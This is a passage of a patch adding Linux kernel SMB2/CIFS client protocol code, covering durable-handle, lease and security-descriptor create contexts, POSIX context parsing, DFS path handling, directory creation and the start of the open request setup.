++	flags |= CIFS_NO_RSP_BUF;
++
++	iov[0].iov_base = (char *)req;
++	iov[0].iov_len = total_len;
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = 1;
++
++	rc = cifs_send_recv(xid, ses, ses->server,
++			    &rqst, &resp_buf_type, flags, &rsp_iov);
++	cifs_small_buf_release(req);
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_TREE_DISCONNECT_HE);
++		trace_smb3_tdis_err(xid, tcon->tid, ses->Suid, rc);
++	}
++	trace_smb3_tdis_done(xid, tcon->tid, ses->Suid);
++
++	return rc;
++}
++
++static struct create_durable *
++create_durable_buf(void)
++{
++	struct create_durable *buf;
++
++	buf = kzalloc(sizeof(struct create_durable), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++					(struct create_durable, Data));
++	buf->ccontext.DataLength = cpu_to_le32(16);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_durable, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_DURABLE_HANDLE_REQUEST is "DHnQ" */
++	buf->Name[0] = 'D';
++	buf->Name[1] = 'H';
++	buf->Name[2] = 'n';
++	buf->Name[3] = 'Q';
++	return buf;
++}
++
++static struct create_durable *
++create_reconnect_durable_buf(struct cifs_fid *fid)
++{
++	struct create_durable *buf;
++
++	buf = kzalloc(sizeof(struct create_durable), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++					(struct create_durable, Data));
++	buf->ccontext.DataLength = cpu_to_le32(16);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_durable, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	buf->Data.Fid.PersistentFileId = fid->persistent_fid;
++	buf->Data.Fid.VolatileFileId = fid->volatile_fid;
++	/* SMB2_CREATE_DURABLE_HANDLE_RECONNECT is "DHnC" */
++	buf->Name[0] = 'D';
++	buf->Name[1] = 'H';
++	buf->Name[2] = 'n';
++	buf->Name[3] = 'C';
++	return buf;
++}
++
++static void
++parse_query_id_ctxt(struct create_context *cc, struct smb2_file_all_info *buf)
++{
++	struct create_on_disk_id *pdisk_id = (struct create_on_disk_id *)cc;
++
++	cifs_dbg(FYI, "parse query id context 0x%llx 0x%llx\n",
++		pdisk_id->DiskFileId, pdisk_id->VolumeId);
++	buf->IndexNumber = pdisk_id->DiskFileId;
++}
++
++static void
++parse_posix_ctxt(struct create_context *cc, struct smb2_file_all_info *info,
++		 struct create_posix_rsp *posix)
++{
++	int sid_len;
++	u8 *beg = (u8 *)cc + le16_to_cpu(cc->DataOffset);
++	u8 *end = beg + le32_to_cpu(cc->DataLength);
++	u8 *sid;
++
++	memset(posix, 0, sizeof(*posix));
++
++	posix->nlink = le32_to_cpu(*(__le32 *)(beg + 0));
++	posix->reparse_tag = le32_to_cpu(*(__le32 *)(beg + 4));
++	posix->mode = le32_to_cpu(*(__le32 *)(beg + 8));
++
++	sid = beg + 12;
++	sid_len = posix_info_sid_size(sid, end);
++	if (sid_len < 0) {
++		cifs_dbg(VFS, "bad owner sid in posix create response\n");
++		return;
++	}
++	memcpy(&posix->owner, sid, sid_len);
++
++	sid = sid + sid_len;
++	sid_len = posix_info_sid_size(sid, end);
++	if (sid_len < 0) {
++		cifs_dbg(VFS, "bad group sid in posix create response\n");
++		return;
++	}
++	memcpy(&posix->group, sid, sid_len);
++
++	cifs_dbg(FYI, "nlink=%d mode=%o reparse_tag=%x\n",
++		 posix->nlink, posix->mode, posix->reparse_tag);
++}
++
++void
++smb2_parse_contexts(struct TCP_Server_Info *server,
++		    struct smb2_create_rsp *rsp,
++		    unsigned int *epoch, char *lease_key, __u8 *oplock,
++		    struct smb2_file_all_info *buf,
++		    struct create_posix_rsp *posix)
++{
++	char *data_offset;
++	struct create_context *cc;
++	unsigned int next;
++	unsigned int remaining;
++	char *name;
++	static const char smb3_create_tag_posix[] = {
++		0x93, 0xAD, 0x25, 0x50, 0x9C,
++		0xB4, 0x11, 0xE7, 0xB4, 0x23, 0x83,
++		0xDE, 0x96, 0x8B, 0xCD, 0x7C
++	};
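++	/* (the same 16 bytes as SMB2_CREATE_TAG_POSIX in create_posix_buf()) */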
++
++	*oplock = 0;
++	data_offset = (char *)rsp + le32_to_cpu(rsp->CreateContextsOffset);
++	remaining = le32_to_cpu(rsp->CreateContextsLength);
++	cc = (struct create_context *)data_offset;
++
++	/* Initialize inode number to 0 in case no valid data in qfid context */
++	if (buf)
++		buf->IndexNumber = 0;
++
++	while (remaining >= sizeof(struct create_context)) {
++		name = le16_to_cpu(cc->NameOffset) + (char *)cc;
++		if (le16_to_cpu(cc->NameLength) == 4 &&
++		    strncmp(name, SMB2_CREATE_REQUEST_LEASE, 4) == 0)
++			*oplock = server->ops->parse_lease_buf(cc, epoch,
++							   lease_key);
++		else if (buf && (le16_to_cpu(cc->NameLength) == 4) &&
++		    strncmp(name, SMB2_CREATE_QUERY_ON_DISK_ID, 4) == 0)
++			parse_query_id_ctxt(cc, buf);
++		else if ((le16_to_cpu(cc->NameLength) == 16)) {
++			if (posix &&
++			    memcmp(name, smb3_create_tag_posix, 16) == 0)
++				parse_posix_ctxt(cc, buf, posix);
++		}
++		/* else {
++			cifs_dbg(FYI, "Context not matched with len %d\n",
++				le16_to_cpu(cc->NameLength));
++			cifs_dump_mem("Cctxt name: ", name, 4);
++		} */
++
++		next = le32_to_cpu(cc->Next);
++		if (!next)
++			break;
++		remaining -= next;
++		cc = (struct create_context *)((char *)cc + next);
++	}
++
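++	/* if the server did not grant a lease, the plain oplock level applies */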
++	if (rsp->OplockLevel != SMB2_OPLOCK_LEVEL_LEASE)
++		*oplock = rsp->OplockLevel;
++
++	return;
++}
++
++static int
++add_lease_context(struct TCP_Server_Info *server, struct kvec *iov,
++		  unsigned int *num_iovec, u8 *lease_key, __u8 *oplock)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	iov[num].iov_base = server->ops->create_lease_buf(lease_key, *oplock);
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = server->vals->create_lease_size;
++	req->RequestedOplockLevel = SMB2_OPLOCK_LEVEL_LEASE;
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset = cpu_to_le32(
++				sizeof(struct smb2_create_req) +
++				iov[num - 1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength,
++		     server->vals->create_lease_size);
++	*num_iovec = num + 1;
++	return 0;
++}
++
++static struct create_durable_v2 *
++create_durable_v2_buf(struct cifs_open_parms *oparms)
++{
++	struct cifs_fid *pfid = oparms->fid;
++	struct create_durable_v2 *buf;
++
++	buf = kzalloc(sizeof(struct create_durable_v2), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++					(struct create_durable_v2, dcontext));
++	buf->ccontext.DataLength = cpu_to_le32(sizeof(struct durable_context_v2));
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct create_durable_v2, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++
++	/*
++	 * NB: Handle timeout defaults to 0, which allows server to choose
++	 * (most servers default to 120 seconds) and most clients default to 0.
++	 * This can be overridden at mount ("handletimeout=") if the user wants
++	 * a different persistent (or resilient) handle timeout for all opens
++	 * on a particular SMB3 mount.
++	 */
++	buf->dcontext.Timeout = cpu_to_le32(oparms->tcon->handle_timeout);
++	buf->dcontext.Flags = cpu_to_le32(SMB2_DHANDLE_FLAG_PERSISTENT);
++	generate_random_uuid(buf->dcontext.CreateGuid);
++	memcpy(pfid->create_guid, buf->dcontext.CreateGuid, 16);
++
++	/* SMB2_CREATE_DURABLE_HANDLE_REQUEST is "DH2Q" */
++	buf->Name[0] = 'D';
++	buf->Name[1] = 'H';
++	buf->Name[2] = '2';
++	buf->Name[3] = 'Q';
++	return buf;
++}
++
++static struct create_durable_handle_reconnect_v2 *
++create_reconnect_durable_v2_buf(struct cifs_fid *fid)
++{
++	struct create_durable_handle_reconnect_v2 *buf;
++
++	buf = kzalloc(sizeof(struct create_durable_handle_reconnect_v2),
++			GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset =
++		cpu_to_le16(offsetof(struct create_durable_handle_reconnect_v2,
++				     dcontext));
++	buf->ccontext.DataLength =
++		cpu_to_le32(sizeof(struct durable_reconnect_context_v2));
++	buf->ccontext.NameOffset =
++		cpu_to_le16(offsetof(struct create_durable_handle_reconnect_v2,
++			    Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++
++	buf->dcontext.Fid.PersistentFileId = fid->persistent_fid;
++	buf->dcontext.Fid.VolatileFileId = fid->volatile_fid;
++	buf->dcontext.Flags = cpu_to_le32(SMB2_DHANDLE_FLAG_PERSISTENT);
++	memcpy(buf->dcontext.CreateGuid, fid->create_guid, 16);
++
++	/* SMB2_CREATE_DURABLE_HANDLE_RECONNECT_V2 is "DH2C" */
++	buf->Name[0] = 'D';
++	buf->Name[1] = 'H';
++	buf->Name[2] = '2';
++	buf->Name[3] = 'C';
++	return buf;
++}
++
++static int
++add_durable_v2_context(struct kvec *iov, unsigned int *num_iovec,
++		    struct cifs_open_parms *oparms)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	iov[num].iov_base = create_durable_v2_buf(oparms);
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = sizeof(struct create_durable_v2);
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset =
++			cpu_to_le32(sizeof(struct smb2_create_req) +
++								iov[1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength, sizeof(struct create_durable_v2));
++	*num_iovec = num + 1;
++	return 0;
++}
++
++static int
++add_durable_reconnect_v2_context(struct kvec *iov, unsigned int *num_iovec,
++		    struct cifs_open_parms *oparms)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	/* indicate that we don't need to relock the file */
++	oparms->reconnect = false;
++
++	iov[num].iov_base = create_reconnect_durable_v2_buf(oparms->fid);
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = sizeof(struct create_durable_handle_reconnect_v2);
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset =
++			cpu_to_le32(sizeof(struct smb2_create_req) +
++								iov[1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength,
++			sizeof(struct create_durable_handle_reconnect_v2));
++	*num_iovec = num + 1;
++	return 0;
++}
++
++static int
++add_durable_context(struct kvec *iov, unsigned int *num_iovec,
++		    struct cifs_open_parms *oparms, bool use_persistent)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	if (use_persistent) {
++		if (oparms->reconnect)
++			return add_durable_reconnect_v2_context(iov, num_iovec,
++								oparms);
++		else
++			return add_durable_v2_context(iov, num_iovec, oparms);
++	}
++
++	if (oparms->reconnect) {
++		iov[num].iov_base = create_reconnect_durable_buf(oparms->fid);
++		/* indicate that we don't need to relock the file */
++		oparms->reconnect = false;
++	} else
++		iov[num].iov_base = create_durable_buf();
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = sizeof(struct create_durable);
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset =
++			cpu_to_le32(sizeof(struct smb2_create_req) +
++								iov[1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength, sizeof(struct create_durable));
++	*num_iovec = num + 1;
++	return 0;
++}
++
++/* See MS-SMB2 2.2.13.2.7 */
++static struct crt_twarp_ctxt *
++create_twarp_buf(__u64 timewarp)
++{
++	struct crt_twarp_ctxt *buf;
++
++	buf = kzalloc(sizeof(struct crt_twarp_ctxt), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof
++					(struct crt_twarp_ctxt, Timestamp));
++	buf->ccontext.DataLength = cpu_to_le32(8);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct crt_twarp_ctxt, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_TIMEWARP_TOKEN is "TWrp" */
++	buf->Name[0] = 'T';
++	buf->Name[1] = 'W';
++	buf->Name[2] = 'r';
++	buf->Name[3] = 'p';
++	buf->Timestamp = cpu_to_le64(timewarp);
++	return buf;
++}
++
++/* See MS-SMB2 2.2.13.2.7 */
++static int
++add_twarp_context(struct kvec *iov, unsigned int *num_iovec, __u64 timewarp)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	iov[num].iov_base = create_twarp_buf(timewarp);
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = sizeof(struct crt_twarp_ctxt);
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset = cpu_to_le32(
++				sizeof(struct smb2_create_req) +
++				iov[num - 1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength, sizeof(struct crt_twarp_ctxt));
++	*num_iovec = num + 1;
++	return 0;
++}
++
++/* See http://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx */
++static void setup_owner_group_sids(char *buf)
++{
++	struct owner_group_sids *sids = (struct owner_group_sids *)buf;
++
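++	/*
++	 * A SID is encoded as: Revision (1 byte), NumAuth (1 byte), a 6-byte
++	 * big-endian Authority, then NumAuth little-endian 32-bit
++	 * subauthorities.  Authority[5] = 5 is the NT authority, so the
++	 * fields below spell out S-1-5-88-1-<uid> and S-1-5-88-2-<gid>.
++	 */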
++	/* Populate the user ownership fields S-1-5-88-1 */
++	sids->owner.Revision = 1;
++	sids->owner.NumAuth = 3;
++	sids->owner.Authority[5] = 5;
++	sids->owner.SubAuthorities[0] = cpu_to_le32(88);
++	sids->owner.SubAuthorities[1] = cpu_to_le32(1);
++	sids->owner.SubAuthorities[2] = cpu_to_le32(current_fsuid().val);
++
++	/* Populate the group ownership fields S-1-5-88-2 */
++	sids->group.Revision = 1;
++	sids->group.NumAuth = 3;
++	sids->group.Authority[5] = 5;
++	sids->group.SubAuthorities[0] = cpu_to_le32(88);
++	sids->group.SubAuthorities[1] = cpu_to_le32(2);
++	sids->group.SubAuthorities[2] = cpu_to_le32(current_fsgid().val);
++
++	cifs_dbg(FYI, "owner S-1-5-88-1-%d, group S-1-5-88-2-%d\n", current_fsuid().val, current_fsgid().val);
++}
++
++/* See MS-SMB2 2.2.13.2.2 and MS-DTYP 2.4.6 */
++static struct crt_sd_ctxt *
++create_sd_buf(umode_t mode, bool set_owner, unsigned int *len)
++{
++	struct crt_sd_ctxt *buf;
++	__u8 *ptr, *aclptr;
++	unsigned int acelen, acl_size, ace_count;
++	unsigned int owner_offset = 0;
++	unsigned int group_offset = 0;
++	struct smb3_acl acl = {};
++
++	*len = round_up(sizeof(struct crt_sd_ctxt) + (sizeof(struct cifs_ace) * 4), 8);
++
++	if (set_owner) {
++		/* sizeof(struct owner_group_sids) is already a multiple of 8, so no need to round */
++		*len += sizeof(struct owner_group_sids);
++	}
++
++	buf = kzalloc(*len, GFP_KERNEL);
++	if (buf == NULL)
++		return buf;
++
++	ptr = (__u8 *)&buf[1];
++	if (set_owner) {
++		/* offset fields are from beginning of security descriptor not of create context */
++		owner_offset = ptr - (__u8 *)&buf->sd;
++		buf->sd.OffsetOwner = cpu_to_le32(owner_offset);
++		group_offset = owner_offset + offsetof(struct owner_group_sids, group);
++		buf->sd.OffsetGroup = cpu_to_le32(group_offset);
++
++		setup_owner_group_sids(ptr);
++		ptr += sizeof(struct owner_group_sids);
++	} else {
++		buf->sd.OffsetOwner = 0;
++		buf->sd.OffsetGroup = 0;
++	}
++
++	buf->ccontext.DataOffset = cpu_to_le16(offsetof(struct crt_sd_ctxt, sd));
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof(struct crt_sd_ctxt, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_SD_BUFFER_TOKEN is "SecD" */
++	buf->Name[0] = 'S';
++	buf->Name[1] = 'e';
++	buf->Name[2] = 'c';
++	buf->Name[3] = 'D';
++	buf->sd.Revision = 1;  /* Must be one see MS-DTYP 2.4.6 */
++
++	/*
++	 * ACL is "self relative" ie ACL is stored in contiguous block of memory
++	 * and "DP" ie the DACL is present
++	 */
++	buf->sd.Control = cpu_to_le16(ACL_CONTROL_SR | ACL_CONTROL_DP);
++
++	/* offset owner, group and Sbz1 and SACL are all zero */
++	buf->sd.OffsetDacl = cpu_to_le32(ptr - (__u8 *)&buf->sd);
++	/* Skip over the ACL header for now; we will copy it into buf later. */
++	aclptr = ptr;
++	ptr += sizeof(struct smb3_acl);
++
++	/* create one ACE to hold the mode embedded in reserved special SID */
++	acelen = setup_special_mode_ACE((struct cifs_ace *)ptr, (__u64)mode);
++	ptr += acelen;
++	acl_size = acelen + sizeof(struct smb3_acl);
++	ace_count = 1;
++
++	if (set_owner) {
++		/* no need to reallocate the buffer for the two extra ACEs; there is plenty of space */
++		acelen = setup_special_user_owner_ACE((struct cifs_ace *)ptr);
++		ptr += acelen;
++		acl_size += acelen;
++		ace_count += 1;
++	}
++
++	/* and one more ACE to allow access for authenticated users */
++	acelen = setup_authusers_ACE((struct cifs_ace *)ptr);
++	ptr += acelen;
++	acl_size += acelen;
++	ace_count += 1;
++
++	acl.AclRevision = ACL_REVISION; /* See 2.4.4.1 of MS-DTYP */
++	acl.AclSize = cpu_to_le16(acl_size);
++	acl.AceCount = cpu_to_le16(ace_count);
++	/* acl.Sbz1 and Sbz2 MBZ so are not set here, but initialized above */
++	memcpy(aclptr, &acl, sizeof(struct smb3_acl));
++
++	buf->ccontext.DataLength = cpu_to_le32(ptr - (__u8 *)&buf->sd);
++	*len = round_up((unsigned int)(ptr - (__u8 *)buf), 8);
++
++	return buf;
++}
++
++static int
++add_sd_context(struct kvec *iov, unsigned int *num_iovec, umode_t mode, bool set_owner)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++	unsigned int len = 0;
++
++	iov[num].iov_base = create_sd_buf(mode, set_owner, &len);
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = len;
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset = cpu_to_le32(
++				sizeof(struct smb2_create_req) +
++				iov[num - 1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength, len);
++	*num_iovec = num + 1;
++	return 0;
++}
++
++static struct crt_query_id_ctxt *
++create_query_id_buf(void)
++{
++	struct crt_query_id_ctxt *buf;
++
++	buf = kzalloc(sizeof(struct crt_query_id_ctxt), GFP_KERNEL);
++	if (!buf)
++		return NULL;
++
++	buf->ccontext.DataOffset = cpu_to_le16(0);
++	buf->ccontext.DataLength = cpu_to_le32(0);
++	buf->ccontext.NameOffset = cpu_to_le16(offsetof
++				(struct crt_query_id_ctxt, Name));
++	buf->ccontext.NameLength = cpu_to_le16(4);
++	/* SMB2_CREATE_QUERY_ON_DISK_ID is "QFid" */
++	buf->Name[0] = 'Q';
++	buf->Name[1] = 'F';
++	buf->Name[2] = 'i';
++	buf->Name[3] = 'd';
++	return buf;
++}
++
++/* See MS-SMB2 2.2.13.2.9 */
++static int
++add_query_id_context(struct kvec *iov, unsigned int *num_iovec)
++{
++	struct smb2_create_req *req = iov[0].iov_base;
++	unsigned int num = *num_iovec;
++
++	iov[num].iov_base = create_query_id_buf();
++	if (iov[num].iov_base == NULL)
++		return -ENOMEM;
++	iov[num].iov_len = sizeof(struct crt_query_id_ctxt);
++	if (!req->CreateContextsOffset)
++		req->CreateContextsOffset = cpu_to_le32(
++				sizeof(struct smb2_create_req) +
++				iov[num - 1].iov_len);
++	le32_add_cpu(&req->CreateContextsLength, sizeof(struct crt_query_id_ctxt));
++	*num_iovec = num + 1;
++	return 0;
++}
++
++static int
++alloc_path_with_tree_prefix(__le16 **out_path, int *out_size, int *out_len,
++			    const char *treename, const __le16 *path)
++{
++	int treename_len, path_len;
++	struct nls_table *cp;
++	const __le16 sep[] = {cpu_to_le16('\\'), cpu_to_le16(0x0000)};
++
++	/*
++	 * skip leading "\\"
++	 */
++	treename_len = strlen(treename);
++	if (treename_len < 2 || !(treename[0] == '\\' && treename[1] == '\\'))
++		return -EINVAL;
++
++	treename += 2;
++	treename_len -= 2;
++
++	path_len = UniStrnlen((wchar_t *)path, PATH_MAX);
++
++	/* make room for one path separator only if @path isn't empty */
++	*out_len = treename_len + (path[0] ? 1 : 0) + path_len;
++
++	/*
++	 * final path needs to be 8-byte aligned as specified in
++	 * MS-SMB2 2.2.13 SMB2 CREATE Request.
++	 */
++	*out_size = round_up(*out_len * sizeof(__le16), 8);
++	*out_path = kzalloc(*out_size + sizeof(__le16) /* null */, GFP_KERNEL);
++	if (!*out_path)
++		return -ENOMEM;
++
++	cp = load_nls_default();
++	cifs_strtoUTF16(*out_path, treename, treename_len, cp);
++
++	/* Do not append the separator if the path is empty */
++	if (path[0] != cpu_to_le16(0x0000)) {
++		UniStrcat(*out_path, sep);
++		UniStrcat(*out_path, path);
++	}
++
++	unload_nls(cp);
++
++	return 0;
++}
++
++int smb311_posix_mkdir(const unsigned int xid, struct inode *inode,
++			       umode_t mode, struct cifs_tcon *tcon,
++			       const char *full_path,
++			       struct cifs_sb_info *cifs_sb)
++{
++	struct smb_rqst rqst;
++	struct smb2_create_req *req;
++	struct smb2_create_rsp *rsp = NULL;
++	struct cifs_ses *ses = tcon->ses;
++	struct kvec iov[3]; /* make sure at least one for each open context */
++	struct kvec rsp_iov = {NULL, 0};
++	int resp_buftype;
++	int uni_path_len;
++	__le16 *copy_path = NULL;
++	int copy_size;
++	int rc = 0;
++	unsigned int n_iov = 2;
++	__u32 file_attributes = 0;
++	char *pc_buf = NULL;
++	int flags = 0;
++	unsigned int total_len;
++	__le16 *utf16_path = NULL;
++	struct TCP_Server_Info *server = cifs_pick_channel(ses);
++
++	cifs_dbg(FYI, "mkdir\n");
++
++	/* resource #1: path allocation */
++	utf16_path = cifs_convert_path_to_utf16(full_path, cifs_sb);
++	if (!utf16_path)
++		return -ENOMEM;
++
++	if (!ses || !server) {
++		rc = -EIO;
++		goto err_free_path;
++	}
++
++	/* resource #2: request */
++	rc = smb2_plain_req_init(SMB2_CREATE, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		goto err_free_path;
++
++	if (smb3_encryption_required(tcon))
++		flags |= CIFS_TRANSFORM_REQ;
++
++	req->ImpersonationLevel = IL_IMPERSONATION;
++	req->DesiredAccess = cpu_to_le32(FILE_WRITE_ATTRIBUTES);
++	/* File attributes ignored on open (used in create though) */
++	req->FileAttributes = cpu_to_le32(file_attributes);
++	req->ShareAccess = FILE_SHARE_ALL_LE;
++	req->CreateDisposition = cpu_to_le32(FILE_CREATE);
++	req->CreateOptions = cpu_to_le32(CREATE_NOT_FILE);
++
++	iov[0].iov_base = (char *)req;
++	/* -1 since last byte is buf[0] which is sent below (path) */
++	iov[0].iov_len = total_len - 1;
++
++	req->NameOffset = cpu_to_le16(sizeof(struct smb2_create_req));
++
++	/* [MS-SMB2] 2.2.13 NameOffset:
++	 * If SMB2_FLAGS_DFS_OPERATIONS is set in the Flags field of
++	 * the SMB2 header, the file name includes a prefix that will
++	 * be processed during DFS name normalization as specified in
++	 * section 3.3.5.9. Otherwise, the file name is relative to
++	 * the share that is identified by the TreeId in the SMB2
++	 * header.
++	 */
++	if (tcon->share_flags & SHI1005_FLAGS_DFS) {
++		int name_len;
++
++		req->hdr.Flags |= SMB2_FLAGS_DFS_OPERATIONS;
++		rc = alloc_path_with_tree_prefix(&copy_path, &copy_size,
++						 &name_len,
++						 tcon->tree_name, utf16_path);
++		if (rc)
++			goto err_free_req;
++
++		req->NameLength = cpu_to_le16(name_len * 2);
++		uni_path_len = copy_size;
++		/* free before overwriting resource */
++		kfree(utf16_path);
++		utf16_path = copy_path;
++	} else {
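++		/* two bytes per UTF-16 code unit, plus the 2-byte null terminator */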
++		uni_path_len = (2 * UniStrnlen((wchar_t *)utf16_path, PATH_MAX)) + 2;
++		/* MUST set path len (NameLength) to 0 opening root of share */
++		req->NameLength = cpu_to_le16(uni_path_len - 2);
++		if (uni_path_len % 8 != 0) {
++			copy_size = roundup(uni_path_len, 8);
++			copy_path = kzalloc(copy_size, GFP_KERNEL);
++			if (!copy_path) {
++				rc = -ENOMEM;
++				goto err_free_req;
++			}
++			memcpy((char *)copy_path, (const char *)utf16_path,
++			       uni_path_len);
++			uni_path_len = copy_size;
++			/* free before overwriting resource */
++			kfree(utf16_path);
++			utf16_path = copy_path;
++		}
++	}
++
++	iov[1].iov_len = uni_path_len;
++	iov[1].iov_base = utf16_path;
++	req->RequestedOplockLevel = SMB2_OPLOCK_LEVEL_NONE;
++
++	if (tcon->posix_extensions) {
++		/* resource #3: posix buf */
++		rc = add_posix_context(iov, &n_iov, mode);
++		if (rc)
++			goto err_free_req;
++		pc_buf = iov[n_iov-1].iov_base;
++	}
++
++	memset(&rqst, 0, sizeof(struct smb_rqst));
++	rqst.rq_iov = iov;
++	rqst.rq_nvec = n_iov;
++
++	/* no need to inc num_remote_opens because we close it just below */
++	trace_smb3_posix_mkdir_enter(xid, tcon->tid, ses->Suid, full_path, CREATE_NOT_FILE,
++				    FILE_WRITE_ATTRIBUTES);
++	/* resource #4: response buffer */
++	rc = cifs_send_recv(xid, ses, server,
++			    &rqst, &resp_buftype, flags, &rsp_iov);
++	if (rc) {
++		cifs_stats_fail_inc(tcon, SMB2_CREATE_HE);
++		trace_smb3_posix_mkdir_err(xid, tcon->tid, ses->Suid,
++					   CREATE_NOT_FILE,
++					   FILE_WRITE_ATTRIBUTES, rc);
++		goto err_free_rsp_buf;
++	}
++
++	/*
++	 * Although it is unlikely for rsp to be null while rc is unset,
++	 * adding the check below is slightly safer long term (and quiets
++	 * a Coverity warning)
++	 */
++	rsp = (struct smb2_create_rsp *)rsp_iov.iov_base;
++	if (rsp == NULL) {
++		rc = -EIO;
++		kfree(pc_buf);
++		goto err_free_req;
++	}
++
++	trace_smb3_posix_mkdir_done(xid, rsp->PersistentFileId, tcon->tid, ses->Suid,
++				    CREATE_NOT_FILE, FILE_WRITE_ATTRIBUTES);
++
++	SMB2_close(xid, tcon, rsp->PersistentFileId, rsp->VolatileFileId);
++
++	/* Eventually save off posix specific response info and timestamps */
++
++err_free_rsp_buf:
++	free_rsp_buf(resp_buftype, rsp);
++	kfree(pc_buf);
++err_free_req:
++	cifs_small_buf_release(req);
++err_free_path:
++	kfree(utf16_path);
++	return rc;
++}
++
++int
++SMB2_open_init(struct cifs_tcon *tcon, struct TCP_Server_Info *server,
++	       struct smb_rqst *rqst, __u8 *oplock,
++	       struct cifs_open_parms *oparms, __le16 *path)
++{
++	struct smb2_create_req *req;
++	unsigned int n_iov = 2;
++	__u32 file_attributes = 0;
++	int copy_size;
++	int uni_path_len;
++	unsigned int total_len;
++	struct kvec *iov = rqst->rq_iov;
++	__le16 *copy_path;
++	int rc;
++
++	rc = smb2_plain_req_init(SMB2_CREATE, tcon, server,
++				 (void **) &req, &total_len);
++	if (rc)
++		return rc;
++
++	iov[0].iov_base = (char *)req;
++	/* -1 since last byte is buf[0] which is sent below (path) */
++	iov[0].iov_len = total_len - 1;
++
++	if (oparms->create_options & CREATE_OPTION_READONLY)
++		file_attributes |= ATTR_READONLY;
++	if (oparms->create_options & CREATE_OPTION_SPECIAL)
++		file_attributes |= ATTR_SYSTEM;
++
++	req->ImpersonationLevel = IL_IMPERSONATION;
++	req->DesiredAccess = cpu_to_le32(oparms->desired_access);
++	/* File attributes ignored on open (used in create though) */
++	req->FileAttributes = cpu_to_le32(file_attributes);
++	req->ShareAccess = FILE_SHARE_ALL_LE;
++
++	req->CreateDisposition = cpu_to_le32(oparms->disposition);
++	req->CreateOptions = cpu_to_le32(oparms->create_options & CREATE_OPTIONS_MASK);
++	req->NameOffset = cpu_to_le16(sizeof(struct smb2_create_req));
++
++	/* [MS-SMB2] 2.2.13 NameOffset:
++	 * If SMB2_FLAGS_DFS_OPERATIONS is set in the Flags field of
++	 * the SMB2 header, the file name includes a prefix that will
++	 * be processed during DFS name normalization as specified in
++	 * section 3.3.5.9. Otherwise, the file name is relative to
++	 * the share that is identified by the TreeId in the SMB2
++	 * header.
++	 */
++	if (tcon->share_flags & SHI1005_FLAGS_DFS) {
++		int name_len;
++
++		req->hdr.Flags |= SMB2_FLAGS_DFS_OPERATIONS;
++		rc = alloc_path_with_tree_prefix(&copy_path, &copy_size,
++						 &name_len,
++						 tcon->tree_name, path);
++		if (rc)
++			return rc;
++		req->NameLength = cpu_to_le16(name_len * 2);
++		uni_path_len = copy_size;
++		path = copy_path;
++	} else {
++		uni_path_len = (2 * UniStrnlen((wchar_t *)path, PATH_MAX)) + 2;
++		/* MUST set path len (NameLength) to 0 when opening the root of a share */
++		req->NameLength = cpu_to_le16(uni_path_len - 2);
++		copy_size = round_up(uni_path_len, 8);
++		copy_path = kzalloc(copy_size, GFP_KERNEL);
++		if (!copy_path)
++			return -ENOMEM;
++		memcpy((char *)copy_path, (const char *)path,
++		       uni_path_len);
++		uni_path_len = copy_size;
++		path = copy_path;
++	}
++
++	iov[1].iov_len = uni_path_len;
++	iov[1].iov_base = path;
++
++	if ((!server->oplocks) || (tcon->no_lease))
++		*oplock = SMB2_OPLOCK_LEVEL_NONE;
++
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_LEASING) ||
